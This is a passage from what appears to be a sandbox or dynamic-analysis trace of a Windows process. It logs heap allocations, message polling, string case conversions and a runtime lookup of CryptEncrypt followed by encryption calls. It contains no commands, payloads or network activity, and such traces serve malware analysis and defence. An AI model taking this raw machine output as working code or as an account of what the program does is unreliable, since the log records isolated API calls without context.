PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0204.778] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0204.778] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0204.778] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.779] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74478 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0204.779] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0204.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0204.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0204.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0204.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0204.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0204.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0204.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0204.780] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0204.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa98 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0204.780] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0204.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0204.781] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0204.781] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0204.781] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0204.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0204.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0204.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0204.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0204.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.783] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0204.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0204.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0204.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0204.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0204.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0204.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaadb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0204.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0204.785] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0204.785] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0204.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.785] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0204.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.785] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.785] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.785] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.785] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.786] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0204.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaabe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0204.786] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a728f8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a728f8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0204.786] PeekMessageW (in: lpMsg=0x8cf3b8, 